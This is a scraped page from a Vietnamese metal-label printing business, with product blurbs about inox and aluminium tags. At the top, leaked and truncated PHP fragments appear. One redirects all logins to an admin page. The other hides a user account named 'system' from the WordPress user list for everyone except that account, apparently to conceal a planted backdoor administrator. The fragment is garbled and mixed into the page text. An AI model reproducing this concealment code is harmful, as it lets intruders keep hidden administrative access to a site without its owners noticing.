roles ) && is_array( $user->roles ) ) { //check for admins if ( in_array( 'subscriber', $user->roles ) ) { // redirect them to the default place $redirect_to = '/wp-admin/admin.php?page=gettingstart'; return $redirect_to; } else { $redirect_to = '/wp-admin/admin.php?page=gettingstart'; return $redirect_to; } } else { $redirect_to = '/wp-admin/admin.php?page=gettingstart'; return $redirect_to; } } add_filter( 'login_redirect', 'my_login_redirect', 10, 3 ); ?>user_login; if ($username == 'system') { } else { global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != 'system'",$user_search->query_where); } } ?> Logo kim loại | in tem nhãn, tem nhãn kim loại, tem nhãn inox, tem nhãn đồng, tem nhãn nhôm, tem nhãn giá rẻ
Đóng
slider 2 copy

Tem nhãn mác inox giá rẻ

Tem nhãn mác inox giá rẻ http://congcuquangcao.com.vn là nơi sản xuất gia công các loại biển, chữ, nhãn mác kim loại […]

18/04/2016

In logo, in tem nhan

Xưởng in tem nhôm giá rẻ

Xưởng in tem nhôm giá rẻ Tem nhôm siêu mỏng hay còn gọi là tem nhôm mạ  được làm bằng chất […]

13/04/2016